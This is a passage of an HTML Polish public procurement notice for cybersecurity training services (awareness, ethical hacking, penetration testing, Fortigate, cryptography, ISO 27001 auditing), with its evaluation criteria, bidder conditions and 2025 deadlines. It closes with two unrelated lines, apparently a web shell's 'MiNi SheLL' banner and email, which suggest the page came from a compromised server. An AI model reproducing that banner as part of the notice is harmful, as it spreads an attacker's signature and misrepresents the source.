wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>Lp.	kryterium	waga<br/>1	Cena (C)	100 %<br/><br/>2.	Cena (C) – waga kryterium 100%, maks. 100 pkt;<br/>3.	Za najkorzystniejszą ofertę zostanie wybrana oferta z największą liczbą punktów. <br/><br/>4.	Sposób oceny ofert w poszczególnych kryteriach:<br/>Cena (C)<br/>cena najniższa brutto*<br/>C =------------------------------------------------x 100 pkt <br/>cena oferty ocenianej brutto<br/>* spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/><br/>•	Podstawą przyznania punktów w kryterium „cena” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym.<br/>•	Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/>5.	Sposób obliczenia punktacji:<br/> P = C<br/>gdzie:<br/><br/>P – łączna liczba punktów<br/>C – liczba punktów w kryterium „Cena”<br/><br/>6.	Za najkorzystniejszą zostanie uznana oferta z największą ilością punktów (P).<br/>7.	Punktacja przyznawana ofertom będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>8.	Maksymalna liczba punktów do zdobycia wynosi 100,00.<br/>9.	W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>10.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale IX SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym:<br/> Zamawiający nie stawia warunku w powyższym zakresie.<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/> Zamawiający nie stawia warunku w powyższym zakresie.<br/>3)	sytuacji ekonomicznej lub finansowej:<br/> Zamawiający nie stawia warunku w powyższym zakresie.<br/>4)	zdolności technicznej lub zawodowej:<br/>CZĘŚĆ 1: <br/>-	Wykonawca wykaże, iż posiada co najmniej 2-letnie doświadczenie w przygotowaniu i przeprowadzeniu szkoleń budujących i wzmacniających świadomość cyberzagrożeń oraz w okresie 3 ostatnich lat przed upływem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wykonał należycie lub wykonuje co najmniej 2 szkolenia z zakresu cyberbezpieczeństwa w jednostkach sektora finansów publicznych. <br/>Zamawiający dokona oceny spełnienia tego warunku na podstawie analizy oświadczenia o spełnieniu warunków udziału w postępowaniu, wykaz usług oraz załączonych dowodów określających, czy usługi te zostały wykonane należycie.<br/>-Wykonawca musi wykazać, iż dysponuje lub będzie dysponował co najmniej 1 osobą, która będzie uczestniczyła w realizacji zamówienia i posiada certyfikat audytora wiodącego ISO/IEC 27001 lub inny certyfikat wymieniony w Rozporządzeniu Ministra Cyfryzacji z dnia 12 października 2018 r. w sprawie wykazu certyfikatu uprawniających do przeprowadzenia audytu (Dz.U. z 2018 r. poz. 1999),<br/>-	Wykonawca musi wykazać, iż dysponuje lub będzie dysponował co najmniej 1 osobą, która posiada certyfikat CEH (Certified Ethical Hacker) lub równoważny (po stronie Wykonawcy leży obowiązek uzasadnienia równoważności).<br/>CZĘŚĆ 2: <br/>Zamawiający nie stawia warunku dla Części 2.<br/>CZĘŚĆ 3: <br/>-	Wykonawca musi wykazać, iż dysponuje lub będzie dysponował co najmniej 1 osobą, która posiada minimum 2-letnie doświadczenie w przygotowaniu i przeprowadzeniu szkoleń z cyberbezpieczeństwa „Ethical Hacker v13” w wersji Elite lub inne równoważne, tj. określone na nie niższym poziomie jakości niż CEH (po stronie Wykonawcy leży obowiązek uzasadnienia równoważności).<br/>CZĘŚĆ 4: <br/>-	Wykonawca musi wykazać, iż dysponuje lub będzie dysponował co najmniej 1 osobą, która posiada minimum 2-letnie doświadczenie w przygotowaniu i przeprowadzeniu szkoleń z cyberbezpieczeństwa Certified Penetration Testing Proffesional lub równoważny (po stronie Wykonawcy leży obowiązek uzasadnienia równoważności).<br/>CZĘŚĆ 5: <br/>-	Wykonawca musi wykazać, iż dysponuje lub będzie dysponował co najmniej 1 osobą, która posiada minimum 2-letnie doświadczenie w przygotowaniu i przeprowadzeniu kursu Fortigate lub równoważny (po stronie Wykonawcy leży obowiązek uzasadnienia równoważności).<br/>CZĘŚĆ 6: <br/>-	Zamawiający nie stawia warunku dla Części 6.<br/>CZĘŚĆ 7: <br/>-	Wykonawca musi wykazać, iż dysponuje lub będzie dysponował co najmniej 1 osobą, która posiada minimum 2-letnie doświadczenie w przygotowaniu i przeprowadzeniu szkolenia kryptografii w systemach komputerowych.<br/>CZĘŚĆ 8: <br/>-	Wykonawca musi wykazać, iż dysponuje lub będzie dysponował co najmniej 1 osobą, która posiada minimum 2-letnie doświadczenie w przygotowaniu i przeprowadzeniu szkolenia na Audytora Wiodącego Systemu Zarządzania Bezpieczeństwem Informacji wg PN-EN ISO/IEC 27001 lub równoważny (po stronie Wykonawcy leży obowiązek uzasadnienia równoważności).<br/>3.	W przypadku wykonawców wspólnie ubiegających się o udzielnie zamówienia warunek <br/>( dla każdej części) dotyczącej zdolności technicznej lub zawodowej musi być spełniony w całości przez co najmniej jednego z wykonawców wspólnie ubiegających się.<br/>4.	Jeżeli wykonawca na potwierdzenie spełnienia warunku udziału w postępowaniu przedstawi w wykazie wykonanych usług lub dokumentach potwierdzających należyte wykonanie wskazanych usług wartości wyrażone w innej walucie niż złoty, zamawiający do oceny spełnienia warunku przeliczy podaną wartość po średnim kursie tej waluty w stosunku do złotego publikowanym przez NBP z dnia wszczęcia postępowania.<br/>5.	Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełniania, w zakresie, w jakim powołuje się na ich zasoby, warunków udziału w postępowaniu, zamieszcza informacje o tych podmiotach w oświadczeniu o spełnianiu warunków i oświadczeniu o niepodleganiu wykluczeniu. <br/>6.	Uwaga: w celu spełnienia wymagań wynikających z treści art. 118 ust. 2 Pzp w sytuacji gdy warunek powyższy będzie spełniony nie przez wykonawcę lub wspólnika konsorcjum a przez podmiot udostępniający wykonawcy swoje zasoby (podmiot trzeci), to ten podmiot musi być podwykonawcą w realizacji umowy.<br/>7.	Zamawiający może na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy, może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">- Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2019 r. poz. 369), z innym Wykonawca, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 6 do SWZ;<br/>- Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">-Wykaz usług wykonanych nie wcześniej niż w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których usługi te zostały wykonane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty; <br/>W przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie 3 miesięcy. - załącznik nr 3 do SWZ; (dotyczy części 1).<br/><br/>-Wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich uprawnień niezbędnych do wykonania przedmiotowego zamówienia publicznego, doświadczenia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie dysponowania tymi osobami, posiadanych certyfikatów – załącznik nr 4 do SWZ; <br/>(dotyczy części 1, 3,4,5,7,8 ).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane/dostawy/usługi wykonają poszczególni wykonawcy.<br/>4.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>5.	Jeżeli zostanie wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców.<br/>6.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z § 12 PPU stanowiącego załącznik nr 9 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-04-24 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/gmina_poswietne</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-04-24 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-05-23</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Z postępowania o udzielenie zamówienia wyklucza się również Wykonawców, w stosunku do których zachodzi którakolwiek z okoliczności wskazanych art. 7 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie<br/>przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego tj.:<br/>1) wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy;<br/>2) wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim<br/>beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy;<br/>3) wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2021 r. poz. 217, 2105 i 2106), jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką<br/>dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy.<br/><br/>Ze względu na ograniczoną liczbę znaków poszczególnych sekcji ogłoszenia, nie wszystkie informacje zostały podane w całości. W tym zakresie Zamawiający odsyła do Specyfikacji Warunków Zamówienia dostępnej na stronie prowadzonego postępowanie.

Creat By MiNi SheLL
Email: jattceo@gmail.com